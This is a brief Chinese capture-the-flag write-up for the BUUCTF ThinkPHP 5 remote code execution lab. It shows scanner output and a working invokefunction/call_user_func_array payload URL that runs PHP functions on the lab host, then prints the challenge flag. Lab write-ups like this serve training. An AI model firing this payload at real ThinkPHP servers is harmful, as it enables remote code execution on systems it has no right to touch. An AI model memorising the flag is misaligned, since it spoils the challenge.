BUUCTF-Real-[ThinkPHP]5-Rce

1、ThinkPHP检测工具

复制代码
https://github.com/anx0ing/thinkphp_scan

漏洞检测

复制代码
通过漏洞检测,我们发现存在rce漏洞!

2、漏洞利用

复制代码
----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability
    Script: thinkphp5022_5129.py
    Url: http://node5.buuoj.cn:27683/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1
----

payload
复制代码
http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it'll execute the phpinfo:

修改payload,我们就可以拿到phpinfo页面,flag就在其中!


复制代码
至于扫描器,githb有很多!自己下载!

3、get flag


复制代码
flag{9f4a1a0b-ef58-49ac-8344-63aa3914af75} 
相关推荐
一口一个橘子13 小时前
[ctfshow web入门]web99 in_array的弱比较漏洞
web安全·网络安全·php
波吉爱睡觉14 小时前
Redis反弹Shell
redis·web安全·网络安全
wha the fuck40415 小时前
攻防世界-引导-Web_php_unserialize
安全·web安全·网络安全·php
烟斗与演绎20 小时前
综合实验(4)
网络·网络安全·智能路由器
m0_747266091 天前
代码审计与web安全选择题1
网络安全
编程到天明1 天前
CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”
网络安全·php
Johny_Zhao1 天前
CentOS Stream 9上部署FTP应用服务的两种方法(传统安装和docker-compose)
linux·网络安全·信息安全·kubernetes·云计算·containerd·ftp·yum源·系统运维
Johny_Zhao3 天前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
落鹜秋水4 天前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
pencek4 天前
XCTF-crypto-幂数加密
网络安全